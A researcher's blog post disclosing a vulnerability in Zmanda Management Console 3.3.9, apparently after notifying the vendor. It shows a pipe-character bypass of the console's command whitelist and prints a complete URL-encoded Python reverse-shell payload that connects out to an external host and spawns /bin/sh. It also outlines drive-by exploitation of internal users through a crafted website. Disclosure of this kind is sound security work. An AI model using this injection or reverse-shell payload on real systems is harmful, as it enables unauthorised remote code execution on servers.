Zmanda Management Console 3.3.9

Weak default credentials in combination with missing input validation allow a remote attacker to execute arbitrary code on a server using the Zmanda Management Console 3.3.9.


It's possible to execute whitelisted commands using the following link without any CSRF protection:

"Only the following non-interactive commands are permitted: amadmin, amcheckdb, amcleanup, amdump, amflush, amlabel, amlabel, amreport, amrmtape, bzip2, chgrp, chmod, chown, cp, date, df, diff, du, echo, env, file, find, grep, gzip, head, ls, lsattr, lsscsi, man, md5sum, mkdir, mt, mtx, mv, nslookup, ping, ps, pstree, sha1sum, sha224sum, sha256sum, sha384sum, sha512sum, sort, star, stty, tail, tar, top, traceroute, tree, uname, uptime"

Clicking the following link will execute the "echo" command displaying the string "test":

By abusing the piping feature via "echo test | whoami" it's possible to bypass the restriction to execute the "whoami" command:|whoami

Leveraging that behavior allows to execute arbitrary code using a Python reverse shell. Clicking the following link will connect the server to on port 8080 spawning a /bin/sh shell:|python%20-c%20%27import%20socket%2csubprocess%2cos%3bs%3dsocket%2esocket%28socket%2eAF_INET%2csocket%2eSOCK_STREAM%29%3bs%2econnect%28%28"s3cur3%2eeu"%2c8080%29%29%3bos%2edup2%28s%2efileno%28%29%2c0%29%3bos%2edup2%28s%2efileno%28%29%2c1%29%3bos%2edup2%28s%2efileno%28%29%2c2%29%3bp%3dsubprocess%2ecall%28%5b"%2fbin%2fsh"%2c"-i"%5d%29%3b%27

Using network fingerprinting techniques it's possible to automatically exploit the vulnerability in combination with weak default credentials if an employee connected to the internal network visits a special website.

Reverse shell incoming


The vulnerability was disclosed to Zmanda prior to publishing the vulnerability details. Slides to my BSides Lisbon presentation can be found here.

Blog Logo

Robert Kugler

Information security and human rights enthusiast



Robert Kugler


Back to Overview